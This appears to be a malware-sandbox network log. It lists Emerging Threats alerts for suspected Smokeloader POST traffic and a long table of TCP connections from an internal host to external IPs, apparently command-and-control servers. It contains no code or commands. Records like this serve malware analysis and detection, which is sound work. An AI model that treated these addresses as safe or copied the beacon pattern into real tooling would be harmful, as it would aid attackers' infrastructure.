                                                                                                                                            2024-10-04T19:18:13.846347+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449833177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:18:19.449251+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449864177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:19:30.096822+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450035177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:19:37.691008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450036177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:19:47.223334+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450037177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:19:58.725636+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450038177.129.90.10680TCP
                                                                                                                                            2024-10-04T19:20:14.259793+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450039180.75.11.13380TCP
                                                                                                                                            2024-10-04T19:20:28.126238+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450040180.75.11.13380TCP
                                                                                                                                            2024-10-04T19:20:42.965243+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450041180.75.11.13380TCP
                                                                                                                                            2024-10-04T19:20:57.598842+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450042180.75.11.13380TCP
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 4, 2024 19:17:29.892277956 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:29.900686026 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:29.900872946 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:29.901056051 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:29.901079893 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:29.908004999 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:29.908469915 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.162223101 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.163259983 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.163379908 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.189086914 CEST4973680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.194627047 CEST8049736177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.203016043 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.208080053 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.208173037 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.219259024 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.219259024 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:31.224256039 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:31.224315882 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.743103981 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.743736982 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.743839025 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.743839025 CEST4973780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.746597052 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.748874903 CEST8049737177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.751677036 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.751825094 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.751941919 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.751979113 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:32.756823063 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:32.756916046 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.012309074 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.012593031 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.015007019 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.015053988 CEST4973880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.017842054 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.020073891 CEST8049738177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.023808956 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.023900032 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.024044991 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.024066925 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:34.028985977 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:34.029449940 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.661429882 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.661689997 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.661778927 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.661921978 CEST4973980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.665900946 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.666724920 CEST8049739177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.670844078 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.670914888 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.671066046 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.671091080 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:35.676795959 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:35.677556038 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.176362038 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.176422119 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.176451921 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.176772118 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.177001953 CEST4974080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.179985046 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.181937933 CEST8049740177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.184988022 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.185075998 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.185187101 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.185203075 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:37.190222979 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:37.190357924 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.460279942 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.460949898 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.461102962 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.461102962 CEST4974180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.463537931 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.466090918 CEST8049741177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.468429089 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.468492985 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.468645096 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.468666077 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:38.473472118 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:38.473797083 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.742799044 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.742933989 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.742990017 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.743033886 CEST4974280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.746087074 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.748049974 CEST8049742177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.751303911 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.751406908 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.751497030 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.751589060 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:39.756555080 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:39.756645918 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.935817957 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.935889959 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.935899973 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.936054945 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.936752081 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.936784983 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.936805010 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.937155008 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.937195063 CEST4974380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.938338995 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.941816092 CEST8049743177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.943413973 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.943496943 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.943613052 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.943629980 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:41.948708057 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:41.948743105 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.234663963 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.234875917 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.234931946 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.234968901 CEST4974480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.237822056 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.241780043 CEST8049744177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.247590065 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.247646093 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.247756958 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.247783899 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:43.252576113 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:43.252751112 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.532157898 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.532228947 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.532366037 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.532413006 CEST4974580192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.534626961 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.537230015 CEST8049745177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.539506912 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.539566994 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.539654970 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.539668083 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:44.544436932 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:44.544590950 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.020754099 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.021090984 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.021152973 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.021322966 CEST4974680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.025629997 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.026355028 CEST8049746177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.030805111 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.030878067 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.031004906 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.031042099 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:46.035873890 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:46.035883904 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.326775074 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.327414036 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.327482939 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.327533960 CEST4974780192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.329880953 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.332463980 CEST8049747177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.334695101 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.334758997 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.334846973 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.334862947 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:47.339668989 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:47.339989901 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:48.977094889 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:48.977304935 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:48.977509022 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:48.979948044 CEST4974880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:48.988157034 CEST8049748177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:49.174053907 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:49.180334091 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:49.180411100 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:49.184708118 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:49.184753895 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:49.190361023 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:49.191344023 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.436805964 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.436965942 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.437179089 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.437268019 CEST4974980192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.440129042 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.442117929 CEST8049749177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.445066929 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.445144892 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.445280075 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.445280075 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:50.450193882 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:50.450225115 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.851650953 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.852175951 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.852257013 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.852345943 CEST4975080192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.854979038 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.857382059 CEST8049750177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.860229969 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.860297918 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.860373974 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.860398054 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:51.865545988 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:51.865576982 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.124948025 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.125155926 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.125210047 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.125241041 CEST4975180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.128654957 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.130142927 CEST8049751177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.133938074 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.134046078 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.134146929 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.134146929 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:53.138964891 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:53.139332056 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.706336021 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.706670046 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.706816912 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.706816912 CEST4975280192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.709500074 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.713357925 CEST8049752177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.715966940 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.716056108 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.716171980 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.716207981 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:54.721365929 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:54.721395016 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.980564117 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.980838060 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.981021881 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.981021881 CEST4975380192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.983423948 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.986166000 CEST8049753177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.988776922 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.988857031 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.989092112 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.989126921 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:55.994267941 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:55.994298935 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.269402981 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.270010948 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.270101070 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.270184994 CEST4975480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.272176981 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.275223970 CEST8049754177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.277146101 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.277218103 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.277337074 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.277393103 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:57.282468081 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:57.282499075 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.561872959 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.562470913 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.562665939 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.562666893 CEST4975680192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.567559958 CEST8049756177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.671758890 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.676729918 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.676819086 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.677289963 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.677308083 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:58.682271004 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:58.682614088 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.955315113 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.955872059 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.955930948 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.955996990 CEST4975880192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.958348036 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.960915089 CEST8049758177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.963229895 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.963304043 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.963534117 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.963534117 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:17:59.968513966 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:17:59.968573093 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.348764896 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.349019051 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.349075079 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.349108934 CEST4976480192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.354088068 CEST8049764177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.358963966 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.363863945 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.363933086 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.364276886 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.364296913 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:01.369263887 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:01.369348049 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:02.656132936 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:02.656718016 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:02.656821966 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:02.656821966 CEST4977180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:02.658967018 CEST4978180192.168.2.4177.129.90.106
                                                                                                                                            Oct 4, 2024 19:18:02.661689997 CEST8049771177.129.90.106192.168.2.4
                                                                                                                                            Oct 4, 2024 19:18:02.663861990 CEST8049781177.129.90.106192.168.2.4
